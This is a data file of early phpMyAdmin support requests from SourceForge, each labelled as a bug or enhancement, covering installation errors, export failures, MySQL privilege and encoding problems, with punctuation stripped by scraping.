"24444","2274","phpMyAdmin>2.5.0 apache error log Could not load program Co. Hi, I tried different version of phpMyadmin 2.3.2 2.3.3 2.4.0 2.5.0 2.5.1 2.5.2 2.5.3 2.5.5 2.5.6rc2 All the version lt;2.5.1 works correctly but the last one refuse to start with the following Apache error log Could not load program name of program that failed to load Php just doesnt want to start.
I disabled the gzip which is not compile in my php) but nothing work My php is System AIX J50D 3 4 000BD4B3A100 Build Date Jul 9 2003 16 39 27 Configure Command s00 opendata build php 4.3.0 configure with config file path= s00 app sso admin SSOD conf apache with prefix= s00 app php product SSOD with apxs= s00 app apache product current bin apxs enable static with ldap= s00 app ldap product current with mhash= s00 app mhash product 0.8.16 with oci8= s00 app oracle product current with java= o00 app java product 1.3.1 enable debug with crack= s00 app crack product 2.7 with mysql= s00 app mysql product current Server API Apache Virtual Directory Support disabled I trully appreciate phpMyadmin and hope to found support.
Cdt Francois Original URL https sourceforge.net p phpmyadmin support requests 458 https sourceforge.net p phpmyadmin support requests 458 Original author anonymous","bug"
"24444","2275","J.S.Fortnight virus.
WARNING Please virus scan the attachments see below.
BitDefender suddenly claimed there were copies of J.S.Fortnight.D virus in my PMA 2.5.5 folder.
I allowed it to move them.
PMA no longer worked.
I moved the folder.
I downloaded 2.5.6 and proceded to unzip.
I cannot extract these 4 files left.php queryframe tbl query box tbl select which BD says still contain viruses.
Does this ring any bells, or has BD gone mad?
Meanwhile, could you send me individual zipped copies of those files so I can do some tests?
... Just seen your attach option, so I will attach the left.php file which BD says contain viruses.
It is a low risk virus which does things to Outlook Express).
Thanks Ian phpmyadmin AT ianco.co.uk Original URL https sourceforge.net p phpmyadmin support requests 459 https sourceforge.net p phpmyadmin support requests 459 Original author ian999 Found in version 2.5.6","bug"
"24444","2276","Cannot browse tables php 4.3.6).
Platform FreeBSD 4.7, apache 1.3.27, mod php4.3.6 Can login to the database, but anytime I try to browse any tables, nothing happens.
I know that there is data in the tables, but the results frame does not change at all.
This only started happening when I updated php to 4.3.6 ...Jay jaymail shampur.com Original URL https sourceforge.net p phpmyadmin support requests 461 https sourceforge.net p phpmyadmin support requests 461 Original author anonymous","bug"
"24444","2277","Unwanted row incrementing.
I am testing a message bulletin that was created in the php format.
Whenever the page is closed and reopened, there is an extra empty row in the message viewing area.
It just increments on its own.
I don t know where to start troubleshooting.
Could this be database related, and if so, how do I correct this problem?
Please advise.
Thank you.
Original URL https sourceforge.net p phpmyadmin support requests 460 https sourceforge.net p phpmyadmin support requests 460 Original author jerilyn Found in version 2.4.0","bug"
"24444","2278","export produces a blank page.
Everything was working normally with PhpMyAdmin 2.4.0 but I wanted to upgrade to 2.5.3.
Everything works fine in 2.5.3 except for exporting tables.
I do not get an error message.
I just get a blank page.
I am running MySQL 4.0.16 PHP 4.3.4 With version 2.5.3 I can no longer export a table or copy a table.
I have tried all the various options for exporting data only, structure only, sql, xml, csv, etc... but they all produce a blank page.
I have compression set to none.
I have tried in different browsers, from IE to Netscape.
They all produce a blank page.
But the old 2.4.0) version exports just fine.
I saw the note in the FAQ [Server] about disabling OBGZip in the config file and zlib compression in the php.ini file.
But that hasn t fixed it... Any ideas?
Original URL https sourceforge.net p phpmyadmin support requests 462 https sourceforge.net p phpmyadmin support requests 462 Original author anonymous Found in version 2.5.3","bug"
"24444","2279","Don t work right with php5.
I ve testet with 2.5.3 and 2.6.0 alpha phpMyAdmin works right, without Browse and Search.
If I click on this Items, there is nothing to see.
On Downgrade zu PHP 4.3.6 all work right.
Sorry for my bad english Original URL https sourceforge.net p phpmyadmin support requests 463 https sourceforge.net p phpmyadmin support requests 463 Original author anonymous","bug"
"24444","2280","Search Page times out when using LIKE with no results.
MySQL 4.0.14 log PHP 4.3.3 PMA 2.5.6 I have checked if this bug has already ben reported, but I can t find it, so here goes.
When using Search to perform a SELECT query, the results page times out and does not return any data.
This only occurs when searching for a string using LIKE when no results are returned.
E.G SELECT FROM `table` WHERE 1 AND `string` LIKE notpresent LIMIT 0,100 is the query that should be submitted.
If the query returns no rows, then the following results occur Safari 1.2.1 Takes ages to process, then does nothing.
Mozilla 1.7 Takes ages to process, then returns an error saying Document contains no data IE 6 Takes ages to process, then returns a page saying tbl select.php Missing db tbl select.php Missing table Note that if the exact same query is submitted using the SQL query box, then it brings up the page saying Query executed successfully .
No rows are returned and no message saying that MySQL returned an empty result set is posted.
The problem only occurs when using the Search page with a LIKE operator with or without wildcards that does not return any rows.
I hope this is enough information.
Cheers, Bodog.
Original URL https sourceforge.net p phpmyadmin support requests 464 https sourceforge.net p phpmyadmin support requests 464 Original author bodog Found in version 2.5.6","bug"
"24444","2281","require fails.
Well basically, my host has decided to set an option in PHP that allows only absolute references to directories, so require .
lib etc...) doesn t work, it MUST be require home user html phpMyAdmin lib etc.. ) Is there an option for this somewhere or is it a bug?
I know most software that I ve had this problem with have a variable called BASE PATH or something of the sort where you can make BASE PATH = home user html phpmyAdmin and then for all the includes requires you write something like require BASE PATH.
lib etc.. ); instead of require .
lib etc... ); I am getting the following error message in the phpMyAdmin that I have installed I downloaded and installed version 2.5.6) Warning main .
libraries grab globals.lib.php) [function.main] failed to create stream No such file or directory in home html aviation hodoekldi phpMyAdmin 2.5.6 index.php on line 9 Fatal error main ) [function.main] Failed opening required .
libraries grab globals.lib.php include path= .
usr local lib php ) in home html aviation hodoekldi phpMyAdmin 2.5.6 index.php on line 9 Original URL https sourceforge.net p phpmyadmin support requests 465 https sourceforge.net p phpmyadmin support requests 465 Original author jytd","bug"
"24444","2282","cannot get to welcome page.
I have uploaded the files for phpmyadmin to my webserver via FTP manually and have had trouble getting to the welcome page.
The error messages I receive seem to show the cause was there was not a libraries directory with certain files in it.
I have created the libraries directory and have put 4 requested via error messages files in there but now after I sent the missing file, .
lang english iso 8859 1.inc.php , it is stuck on the one error message even though I put the file in.. here it is Warning main .
lang english iso 8859 1.inc.php) [function.main] failed to create stream No such file or directory in E \www\immunizewny org\phpmyadmin\libraries\select lang.lib.php on line 264 Fatal error main ) [function.main] Failed opening required .
lang english iso 8859 1.inc.php include path= .
;c \php4\pear ) in E \www\immunizewny org\phpmyadmin\libraries\select lang.lib.php on line 264 Does anyone know what files are supposed to be in the libraries?
Or what I am doing wrong?
Windows 2000 IIS I have configured the config.inc.php.
The docs docs do not mention any libraries only subdirectories and I do not know which ones.
Attached is the config.inc.php file.
Thanks Original URL https sourceforge.net p phpmyadmin support requests 466 https sourceforge.net p phpmyadmin support requests 466 Original author bufhal","bug"
"24444","2283","Can t Log Into MySQL As ControlUser.
I m trying to setup phpmyadmin 2.6.0 alpha1 on top of a working MySQL 4.1.1a alpha nt PHP 5 Release Candidate 2 environment Win2000).
If I use pma with a auth type of config then I can log in without problem; if I add a controluser and reference in config.ini.php) though then I can t log in.
If I add a new user called pma ctlusr then I can log into mysql directly with that username.
If I then execute the following statements taken from the pma documentation) as the root user I can no longer log in as pma ctlusr GRANT SELECT Host, User, Select priv, Insert priv, Update priv, Delete priv, Create priv, Drop priv, Reload priv, Shutdown priv, Process priv, File priv, Grant priv, References priv, Index priv, Alter priv, Show db priv, Super priv, Create tmp table priv, Lock tables priv, Execute priv, Repl slave priv, Repl client priv ) ON mysql.user TO pma ctlusr localhost ; GRANT SELECT ON mysql.db TO pma ctlusr localhost ; GRANT SELECT ON mysql.host TO pma ctlusr localhost ; GRANT SELECT Host, Db, User, Table name, Table priv, Column priv) ON mysql.tables priv TO pma ctlusr localhost ; If I try logging directly into mysql then I get the following error Error 1045 28000) Access denied for user pma ctlusr localhost Using password YES) I assume therefore that something in the grant statements is messing up the pma ctlusr account but can t see what it is.
tintax phiz.org.uk Original URL https sourceforge.net p phpmyadmin support requests 467 https sourceforge.net p phpmyadmin support requests 467 Original author anonymous","bug"
"24444","2284","Javascript Error Access Denied .
PMA has always been buggy on Javacript but this one has me unable to use the new version.
I had an old vers.
of PMA installed in a folder with a .htaccess file for protection.
I installed the new vers.
2.5.6, but get Access Denied error for Javacript the little yellow alert in IE).
The DOC s say that this is because of the .htaccss file.
However I took the whole thing out of that folder and put it at the root, where there is no .htaccess file.
I also changed from config to http in my config.inc.php file.
However, I m still getting the same message.
I suspect that javascript is trying to talk to the other frames but the access is an issue.
I also think the actual problem is in the Query Window at lower left; refreshing left or right frames and the error is still there; refresh this and it goes away.
Any suggestions?
Sam Fullman Compass Point Media Original URL https sourceforge.net p phpmyadmin support requests 468 https sourceforge.net p phpmyadmin support requests 468 Original author sfullman Found in version 2.5.6","bug"
"24444","2285","remote LOAD DATA INFILE w o LOCAL?.
I have MySQL 4.0.17, PHP 4.3.4, Apache 2.0.47, and phpMyAdmin 2.6.0 Alpha1 all running on a Windows 2003 Server box.
I have not been able to get PHP configured to allow LOAD DATA LOCAL I think due to my inability to install the mysqli PHP extension).
When I access phpMyAdmin from a remote location like my home PC) and go to Insert data from a textfile into table , it allows me to upload a text file stored at that remote location) with LOAD DATA INFILE selected.
This despite the fact that the source file is NOT stored on the MySQL server, and I do NOT have ...DATA LOCAL selected since it just generates an error).
Is phpMyAdmin pulling the file across and storing it in a temp directory on the webserver, then uploading it from that local location?
That s the only thing I could think of that explains this behavior.
I like what it s doing, I just need to know that it s intentional and that I can rely on that functionality.
Thank you!
VBAjedi Original URL https sourceforge.net p phpmyadmin support requests 469 https sourceforge.net p phpmyadmin support requests 469 Original author vbajedi Found in version 2.6.0 alpha1","bug"
"24444","2286","I have an Internal Server Error.
I keep getting the following error and have no idea where to begin to fix it...
When I run phpMyAdmin out of cpanel, ie just click phpmyadmin... this is what I get... Internal Server Error Unable to open engine binary php) at cpsrvd.pl line 1036 main dodoc cpaneld ) called at cpsrvd.pl line 380 main dodoc ) called at cpsrvd.pl line 311 I cannot find any documentation on it at all... please help... Michael Original URL https sourceforge.net p phpmyadmin support requests 470 https sourceforge.net p phpmyadmin support requests 470 Original author anonymous","bug"
"24444","2287","main .
libraries grab globals.lib.php) failed to open strea.
Warning main .
libraries grab globals.lib.php) failed to open stream No such file or directory in home httpd phpmyadmin index.php on line 9 Fatal error main ) Failed opening required .
libraries grab globals.lib.php include path= .
usr lib php ) in home httpd phpmyadmin index.php on line 9 any ideas??
gentoo 1.4 Original URL https sourceforge.net p phpmyadmin support requests 471 https sourceforge.net p phpmyadmin support requests 471 Original author anonymous","bug"
"24444","2288","Double SQL Commands.
Whenever I try to alter a table or do just about anything using 2.5.1 or 2.5.6 haven t tried using older versions) the SQL it generates repeats the commands within the generated query.
For example just trying to change the name of a column yeilds results such as SQL query ALTER TABLE `site links` CHANGE `url` `urlx` VARCHAR 100 ) NOT NULL , CHANGE `url` `urlx` VARCHAR 100 ) NOT NULL MySQL said 1054 Unknown column url in site links Similarly I m having difficulty editing rows for the same reason.
My work around is to copy the SQL it generates and paste it into the SQL window, edit out the duplicate, and execute it manually.
It s maddening.
Help!
Red Hat Linux 9.0 Apache 2.0 PHP 4.2.2 MySQL 3.23.54 Original URL https sourceforge.net p phpmyadmin support requests 472 https sourceforge.net p phpmyadmin support requests 472 Original author anonymous","bug"
"24444","2289","cannot get relation feature working.
hi.
I cannot get the relation feature working ...
I tried in 2.5.2 and it didn t work so I upgraded to 2.5.6... still didn t work.
Here is how I have it set up.
I have a multi user environment so I made a separate database, named it kumar pma in config cfg[ Servers ][ i][ pmadb ] = kumar pma ; since this is a separate table, I set the username pass for this here in config cfg[ Servers ][ i][ user ] = kumar pma ; MySQL user cfg[ Servers ][ i][ password ] = pma2go ; I am connecting using http authentication so there is no conflict there, although I m not sure this is the correct way to specify a user pass for the pma db; it was not mentioned in the docs.
PLEASE NOTE I tried copying the tables from kumar pma into the current database I was working on, re did the config, and still could not get it to work... so this obviously not the cause of the problem.
I created my relation table as such Table structure for table `PMA relation` Creation May 10, 2004 at 02 40 PM Last update May 10, 2004 at 03 16 PM CREATE TABLE `PMA relation` `master db` varchar 64) NOT NULL default , `master table` varchar 64) NOT NULL default , `master field` varchar 64) NOT NULL default , `foreign db` varchar 64) NOT NULL default , `foreign table` varchar 64) NOT NULL default , `foreign field` varchar 64) NOT NULL default , PRIMARY KEY `master db`,`master table`,`master field`), KEY `foreign field` `foreign db`,`foreign table`) ) TYPE=MyISAM COMMENT= Relation table ; just as the docs say to do.
docs from 2.5.2 that is).
so, in 2.5.2 I get the error that linked tables is not configured , and when I click on the error checker, it tells me cfg[ Servers ][ i][ pmadb ] ... OK cfg[ Servers ][ i][ relation ] ... not OK [ Documentation ] General relation features Disabled but ... in 2.6.0 I do NOT get the error that linked tables are not configured.
Still, when I click on my table that I want to set up the links for, go to Structure Relation view, I can only see my foreign key fields but instead just get an empty select box i.e.
I cannot select a foreign table to make a link).
What s even more perplexing is I went into the pma database and manually entered a row as such INSERT INTO `PMA relation` VALUES kumar farmdev , fd portfolio item , portfolio item id , kumar farmdev , fd portfolio item feature , portfolio item id ); ... which seemed to be a sensical foreign key relationship... still !
I cannot define the relations nor see my foreign table in insert update what am I doing wrong??
thanks in advance.
Kumar Original URL https sourceforge.net p phpmyadmin support requests 473 https sourceforge.net p phpmyadmin support requests 473 Original author kumar303","bug"
"24444","2290","cannot creat the table pma bookmark .
I tried to use the creat tables.sql to creat tables, but got an error Error SQL query CREATE TABLE `pma bookmark` `id` int 11 ) DEFAULT 0 NOT NULL AUTO INCREMENT , `dbase` VARCHAR 255 ) NOT NULL , `user` VARCHAR 255 ) NOT NULL , `label` VARCHAR 255 ) NOT NULL , `query` TEXT NOT NULL , PRIMARY KEY `id` ) ) TYPE = MYISAM COMMENT = Bookmarks MySQL said 1067 Invalid default value for id I want to know why.
My mysql s version is 5.0.0alpha, and PHP s version is 5.0.0RC2.
Original URL https sourceforge.net p phpmyadmin support requests 474 https sourceforge.net p phpmyadmin support requests 474 Original author anonymous Found in version 2.6.0 alpha2","bug"
"24444","2291","pma history error restore.
FreeBSD 4.10 PRERELEASE 24 Fri May 14 14 34 18 MSD 2004 MySQL 4.0.18 phpmyadmin 2.5.6 Try to do the following actions mysqladmin create phpmyadmin mysql lt; path to phpmydamin dir scripts create tables.sql mysqldump data bases phpmyadmin add drop table gt; phpmyadmin.sql mysql lt; phpmyadmin.sql Error on last step ERROR 1064 at line 62 You have an error in your SQL syntax.
Check the manual that corresponds to your MySQL server version for the right syntax to use near table varchar 64) NOT NULL default , timevalue timestamp 14 Dump of phpmyadmin database skip DROP TABLE IF EXISTS pma history; CREATE TABLE pma history id bigint 20) unsigned NOT NULL auto increment, username varchar 64) NOT NULL default , db varchar 64) NOT NULL default , table varchar 64) NOT NULL default , is bad name for column timevalue timestamp 14) NOT NULL, sqlquery text NOT NULL, PRIMARY KEY id), KEY username username,db,table,timevalue) ) TYPE=MyISAM COMMENT= SQL history ; skip I think, that it is better to change the name of a column on table name .
Original URL https sourceforge.net p phpmyadmin support requests 475 https sourceforge.net p phpmyadmin support requests 475 Original author oldman rus Found in version 2.5.6","bug"
"24444","2292","Can t Insert Database.
I deperately need help in importing a database using phpmyadmin.
I believe I have installed and configured the program properly.
When I query my database and import the file, I gat a query successful message saying the data has been inserted into my database but nothing appears on the left hand column.
Does anyone know how to fix this?
Original URL https sourceforge.net p phpmyadmin support requests 476 https sourceforge.net p phpmyadmin support requests 476 Original author appetito Found in version 2.5.6","bug"
"24444","2293","Business Development Enquiry.
Hi Who can I contact regarding partnership with ?
Have A Nice Day!
Andrea ) Biz Development Exec W3Centric Network http www.w3centric.com staff andrea Original URL https sourceforge.net p phpmyadmin support requests 477 https sourceforge.net p phpmyadmin support requests 477 Original author z andrea","enhancement"
"24444","2294","Need Help Inserting Data.
The webshosting company I use has a built in phpMyAdmin.
I am trying to import data from an ftp site.
The data is updated every night on the ftp site.
The data on ftp site is divided into 8 classifications.
Each classifications contains 3 folders.
One folders contains the field headers One folders contains corresponding data | delimited) One foldes contains corresponding images Each of the 8 classificiations has between 250 350 field headers with a total of over 80,000 data and image files.
i think) The data and image files are zip, password protected files.
The data on the ftp site can be set up for full or invemental data pulls.
After a full fata pull the incemental data pull average about 700 changes night.
1\.
Is there an easy way to import the data into phpMyAdmin?
2\.
Can phpMyAdmin automatically unzip password protected files and update the info into MySql Server Database on a nightly basis?
3\.
Can you recommend where I can get assistance in doing all of this?
4\.
If I wanted to e mail info of a more confidential nature, ftp site, password) where can I send it to?
Original URL https sourceforge.net p phpmyadmin support requests 478 https sourceforge.net p phpmyadmin support requests 478 Original author berriz","bug"
"24444","2295","need current cvs snapshot for use with MySQL 4.1.2. since there seems to be a problem with the public cvs at sourceforge and an important bug for MySQL 4.1.2 is only fixed at the CVS i need a current snapshot from this.
at the moment i cant work with my phpMyAdmin installation at my development server thnx!
Original URL https sourceforge.net p phpmyadmin support requests 479 https sourceforge.net p phpmyadmin support requests 479 Original author cybot tm Found in version Latest Git","bug"
"24444","2296","force use msqli.dbi.
Fedora Core 2 dev Apache 2.0.49 php 5.0.0 csv MySQL 4.1.2 sql.php uses functions from mysql.dbi.lib.php how can i change this to use functions from mysqli.dbi.lib.php every call to sql.php brings up a blank page it hangs on gt; mysql.dbi.lib.php PMA DBI get fields meta ) gt; mysql fetch field ) Original URL https sourceforge.net p phpmyadmin support requests 480 https sourceforge.net p phpmyadmin support requests 480 Original author cybot tm Found in version 2.6.0 alpha2","bug"
"24444","2297","unable to import sql tables containing umlauts.
When I try to import an sql file exported from another phpMyAdmin, if the file contains umlauts like xc4xba xc3xa4 xc3xb6 theese chars get translated to ?
upon import, this is using MySQL 4.1.1 and PHP 5 RC2.
and 2.6.0 alpha2.
I stumbled on some other problems when trying to change som fieldsvalues as well...
Original URL https sourceforge.net p phpmyadmin support requests 481 https sourceforge.net p phpmyadmin support requests 481 Original author anonymous Found in version 2.6.0 alpha2","bug"
"24444","2298","phpmyadmin installation.
Dear Sirs, I never install any Linux software.
But I have an Apachi Server Red Hat and Ensim Management Software).
It has got phpmyadmin with Ensim.
I have to install full and stable version of phpmyadmin to my server.
Could you help me professionally?
Regards Emre Original URL https sourceforge.net p phpmyadmin support requests 482 https sourceforge.net p phpmyadmin support requests 482 Original author anonymous Found in version 2.5.6","bug"
"24444","2299","Page not found, when inserting various registers.
When you choose to insert a register in a database, and select the Insert another new row option, in the second time you submit the form phpMyAdmin donxc2xb4t found the return page.
firegun terra.com.br Original URL https sourceforge.net p phpmyadmin support requests 483 https sourceforge.net p phpmyadmin support requests 483 Original author anonymous","bug"
"24444","2300","Can t Export large table.
I have a db with several tables, one of which is much larger than the others 1600 album reviews; lots of text).
I went to Export my db after upgrading to 2.5.6 and it died.
After some troubleshooting, I narrowed the problem down to the big reviews table.
Try to export it and it dies on a white screen a few seconds after it starts processing.
All other tables work fine.
Any help would be much appreciated!
Jason Muxlow jason muxlow.org Original URL https sourceforge.net p phpmyadmin support requests 484 https sourceforge.net p phpmyadmin support requests 484 Original author anonymous","bug"
"24444","2301","Multi users.
Hello, I m running Apache 2.0.49 PHP 4.3.6 Phpmyadmin 2.5.6 MySQL 4.0.18 I want to set up a multi user system duh! )
).
But I have seen servers where, on your site, you don t need a username and password when connecting to the database to do stuff ex.
lt;?
mysql connect ); ... ?
gt; ) but, they can not connect to the phpmyadmin page empty password with any user).
I googled around, but I can t find an answer to allow emty logins on pages, but only site admins to connect to phpmyadmin.
I have a dynamic IP, so I can t use the allow, deny option.
Original URL https sourceforge.net p phpmyadmin support requests 485 https sourceforge.net p phpmyadmin support requests 485 Original author massamino Found in version 2.5.6","bug"
"24444","2302","config.inc.php.
I am new to phpMyAdmin and trying to install it on a Linux RedHat 9.0 box for use with osCommerce.
I have mysql running on the server and have installe the phpMyAdmin in the directory where my websites are hosted.
I tried to open the .
phpMyAdmin index.php file and get the following error phpMyAdmin was unable to read your configuration file!
This might happen if php finds a parse error in it or php cannot find the file.
When I tried to open the link on that page phpMyAdmin config.inc.php I got a Forbidden message.
Opening from a host different from the server) I could open this file on the server but was not sure what to change in the config file.
Please help as I have been through many tutorials and not clear on how to config this file.
Original URL https sourceforge.net p phpmyadmin support requests 486 https sourceforge.net p phpmyadmin support requests 486 Original author anonymous Found in version 2.5.2 rc1","bug"
"24444","2303","1148 The used command is not allowed with this MySQL versi.
HI I ve tried this with phpMyAdmin version 2.5.4, 2.5.6 2.5.7 release.
With MySQL version gt; MySQL 4.0.18 standard While trying to import data form a delimited TEXT files using the Insert data from a textfile into table option There is about 1100 records to import) The script runs for a while and then errors with 1148 The used command is not allowed with this MySQL version is this a MySQL error or phpMyAdmin as I ve previous been doing this for a number of months.
I know we have upgrade to the 4.0.18 engine about 2 months ago, and don t remember seeing this problem.
I tested this process against MySQL 3.23.56 and it insert the data fine.
DO I have a configuration since the upgrade of MySQL engines ?
How can we fix this issue?
Thanks Peter Original URL https sourceforge.net p phpmyadmin support requests 487 https sourceforge.net p phpmyadmin support requests 487 Original author peterinorl Found in version 2.5.6","bug"
"24444","2304","Exporting Files from PhpMyAdmin.
I am building a utility for my website that can upload import and export files.
I really liked the GUI of your import export utillity.
I am having trouble understanding the source code.
I wanted to know where could I locate the code for the export GUI.
To be more precise, how do you click one radio button and the options change depending on the radio button marked.
Please contact me at rawhookupz yahoo.com.
Thanks Original URL https sourceforge.net p phpmyadmin support requests 488 https sourceforge.net p phpmyadmin support requests 488 Original author anonymous","bug"
"24444","2305","Exporting Files from PhpMyAdmin.
I am building a utility for my website that can upload import and export files.
I really liked the GUI of your import export utillity.
I am having trouble understanding the source code.
I wanted to know where could I locate the code for the export GUI.
To be more precise, how do you click one radio button and the options change depending on the radio button marked.
Please contact me at rawhookupz yahoo.com.
Thanks Original URL https sourceforge.net p phpmyadmin support requests 489 https sourceforge.net p phpmyadmin support requests 489 Original author anonymous","bug"
"24444","2306","Compression doesn t work with PHP Version 4.3.6.
I just update my PHP to Version 4.3.6.
No other changes.
And from this point any compression in Export doest t work.
I tried in 2.5.7 and in 2.6.0 alpha2.
======================== Errors for zip compression in 2.5.7 Fatal error Allowed memory size of 22020096 bytes exhausted tried to allocate 11792338 bytes) in phpsqladmin libraries zip.lib.php on line 112 Errors for gzip compression in 2.5.7 Fatal error Allowed memory size of 22020096 bytes exhausted tried to allocate 11792356 bytes) in phpsqladmin export.php on line 509 ======================== Errors for zip compression in 2.6.0 alpha2 Fatal error Allowed memory size of 22020096 bytes exhausted tried to allocate 11793127 bytes) in phpmyadmin alpha libraries zip.lib.php on line 112 Errors for gzip compression in 2.6.0 alpha2 Fatal error Allowed memory size of 22020096 bytes exhausted tried to allocate 11793467 bytes) in phpmyadmin alpha export.php on line 510 ======================== You see that I have about 20Mb for memory size post max size = 20M I tried to give it more.
40M for exaple.
Then once it worked out.
But usually export runs out of memory or out of script time.
Once again.
In PHP 4.3.3 all works fine!!!
And with post max size = 20M.
My php config... ======================== .
configure enable versioning enable memory limit with layout=GNU with zlib dir= usr disable all with regex=php disable cli enable ctype enable ftp with gd enable gd native ttf enable gd jis conv with freetype dir= usr local with t1lib= usr local with jpeg dir= usr local with png dir= usr local with xpm dir= usr X11R6 with gettext= usr local with iconv dir= usr local with iconv= usr local with mysql= usr local with openssl dir= usr local with openssl= usr local enable overload with pcre regex=yes enable posix with pspell= usr local enable session enable sockets enable tokenizer with expat dir= usr local enable xml with zip= usr local with zlib=yes with apxs= usr local sbin apxs prefix= usr local i386 portbld freebsd5.0 ======================== Original URL https sourceforge.net p phpmyadmin support requests 490 https sourceforge.net p phpmyadmin support requests 490 Original author makc666","bug"
"24444","2307","export back button of the browser displays compressed file.
Hi All, the following code mostly from phpmyadmin source) successfully downloads and unzips to the ms excel csv file but when i use the back button of the browser after the download)the compressed zipped code is displayed in the browser IE) window.
[BTW the back button is fine on wampp2 arch.
using IE] i m using LAM ySQL]p\{HP] arch.
on Compaq Tru64 UNIX V5.1A Rev.
1885) IE Bug Note while on a different note exporting a zip csv excel file with Netscape windows) from phpmyadmin on LAMP above) architecture gives inavalid zip archive error .
thanks for your help.
lkj php what = excel ; ext; if what == csv || what == excel ) \{ ext = csv ; mime type = text x csv ; \} ext .= .zip ; mime type = application x zip ; extbis = .csv ; if isset compression) compression == zip ) \{ if PMA PHP INT VERSION gt;= 40000 function exists gzcompress )) \{ filename = reportName.
POST [ datasetName ] .
.
startYear .
.
finishYear; zipfile = new zipfile ); zipfile gt; addFile dump buffer, filename .
extbis); dump buffer = zipfile gt; file ); header Content Type .
mime type); header Expires .
now); IE need specific headers if strstr SERVER[ HTTP USER AGENT ], compatible; MSIE ) !== false ) \{ header Content Disposition inline; filename= .
filename .
.
.
ext .
); header Cache Control must revalidate, post check=0, pre check=0 ); header Pragma public ); \} else \{ header Content Disposition attachment; filename= .
filename .
.
.
ext .
); header Pragma no cache ); \} echo dump buffer; ?
gt; Original URL https sourceforge.net p phpmyadmin support requests 491 https sourceforge.net p phpmyadmin support requests 491 Original author anonymous","bug"
"24444","2308","Can not create new table in DB.
I am getting this error message everytime that try and insert a new table into my db.
Warning Cannot modify header information headers already sent by output started at web db admin libraries header meta style.inc.php 21 ) in web db admin libraries db table exists.lib.php on line 30 Does anybody have any expierence with this error???
Anybody have anything I should try or be looking at.
It is a remote mysql server as well if that helps.
Original URL https sourceforge.net p phpmyadmin support requests 492 https sourceforge.net p phpmyadmin support requests 492 Original author garrettpk Found in version 2.5.7","bug"
"24444","2309","comments show despite ShowTooltipAliasTB.
How do I stop table comments from showing up where the table name usually is in the database listings?
I ve tried various settings of ShowTooltipAliasTB, such as FALSE, and of ShowTooltipAlias and ShowTooltipAlias without effect, and consulted with what i thought was the relevant part of http www.phpmyadmin.net documentation config thanks v.much, gherson phpmyadmin 2.5.7 on debian linux.
Original URL https sourceforge.net p phpmyadmin support requests 493 https sourceforge.net p phpmyadmin support requests 493 Original author gherson","bug"
"24444","2310","cannot create database.
When trying to create database, I get this message File Not found The requested URL cannot be access using this method.
Use the GET method instead.
Any ideas?
Thx!
Original URL https sourceforge.net p phpmyadmin support requests 494 https sourceforge.net p phpmyadmin support requests 494 Original author yardsale Found in version 2.5.7","bug"
"24444","2311","can support utf 8 ?.
plz let phpmyadimin support utf 8 phpMyAdmin Language ) Afrikaans af iso 8859 1) Albanian sq iso 8859 1) Arabic ar win1256) Azerbaijani az iso 8859 9) Basque eu iso 8859 1) Bosnian bs win1250) Brazilian portuguese pt br iso 8859 1) Bulgarian bg koi8 r) Bulgarian bg win1251) Catalan ca iso 8859 1) Chinese traditional zh tw) Chinese simplified zh) Croatian hr iso 8859 2) Croatian hr win1250) Czech cs iso 8859 2) Czech cs win1250) Danish da iso 8859 1) Dutch nl iso 8859 1) English en iso 8859 1) Estonian et iso 8859 1) Finnish fi iso 8859 1) French fr iso 8859 1) Galician gl iso 8859 1) German de iso 8859 1) Greek el iso 8859 7) Hebrew he iso 8859 8 i) Hungarian hu iso 8859 2) Indonesian id iso 8859 1) Italian it iso 8859 1) Japanese ja euc) Japanese ja sjis) Korean ko ks c 5601 1987) Latvian lv win1257) Lithuanian lt win1257) Malay ms iso 8859 1) Norwegian no iso 8859 1) Persian fa win1256) Polish pl iso 8859 2) Portuguese pt iso 8859 1) Romanian ro iso 8859 1) Russian ru dos 866) Russian ru koi8 r) Russian ru win1251) Serbian sr win1251) Serbian latin sr lat win1250) Slovak sk iso 8859 2) Slovak sk win1250) Slovenian sl iso 8859 2) Slovenian sl win1250) Spanish es iso 8859 1) Swedish sv iso 8859 1) Thai th tis 620) Turkish tr iso 8859 9) Ukrainian uk win1251) no utf8 I am Taiwanese if it supports utf 8, please tell me ileadukimo yahoo.com.tw Original URL https sourceforge.net p phpmyadmin support requests 496 https sourceforge.net p phpmyadmin support requests 496 Original author anonymous Found in version Latest Git","bug"
"24444","2312","Display Issue with an underscore in database name.
if you give provileges to a lambda user on a database witch name contains an underscore ) he will see the option to create new databases like if he would have CREATE in global privilege On the screenshot, the create database option shouldn t be there Original URL https sourceforge.net p phpmyadmin support requests 495 https sourceforge.net p phpmyadmin support requests 495 Original author kevdavip Found in version 2.5.7","bug"
"24444","2313","phpMyAdmin links don t work.
I recently downloaded a php bundle from your site 4.2.3).
I am doing a PHP MySQL course and the tutor recommended your site.
I understand that phpMyAdmin comes with the bundle but when I type in the URL under localhost, it states that the page cannot be found.
So, I resorted to downloading phpMyAdmin separately.
I used a piece of software called \ PicoZip\ to download the files.
But they required converting before they could be viewed via a html editor.
I managed to convert the files but when I view phpMyAdmin on the Apache server the homepage appears but none of the links work.
Could you please help?
Original URL https sourceforge.net p phpmyadmin support requests 497 https sourceforge.net p phpmyadmin support requests 497 Original author cathyi Found in version 2.5.7","bug"
"24444","2314","query LIKE illegal mix of collations.
actually i m build my databases,tables from phpMyAdmin but when i try to execuate query from MySQL Query Browser 1.0.1 alpha win i got this message ErrNo 1226 Illegel mix of collations latin swedish ci, IMPLICIT) and utf8 general ci, COERCIBLE) for operation LIKE i m regret my ignorance.... gizuk server irc.freenode.net sabah Original URL https sourceforge.net p phpmyadmin support requests 498 https sourceforge.net p phpmyadmin support requests 498 Original author anonymous","bug"
"24444","2315","tabbed pages.
I have been using phpMyAdmin for a few months now and I have been tremendously impressed with its capabilities.
I got it set up in cookie mode so that you can set it to give different rights to different users to different databases.
I d like to see a product like this totally shutdown Microsoft.
One thing that needs to be done is that for the tabbed pages for most users on important databases you would want to remove some of the tabbed pages to eliminate confusion.
For instance, at a previous job, my boss wanted to setup web based access so users could see information about their personnel records, vacation accrued, sick time, etc.
For this they would only need the browse tab.
You d want to remove SQL, Structure, Drop etc.
I don t see an easy way to do that within phpMyAdmin.
Setting up different users to have specific rights to insert change or create to individual databases is very user friendly, but I think what they are able to see needs to be improved.
Original URL https sourceforge.net p phpmyadmin support requests 499 https sourceforge.net p phpmyadmin support requests 499 Original author sullam Found in version 2.5.6","enhancement"
"24444","2316","what format for text files to upload?.
2.5.3 rc1 I am using phpmyadmin to upload a text file to a MySql database.
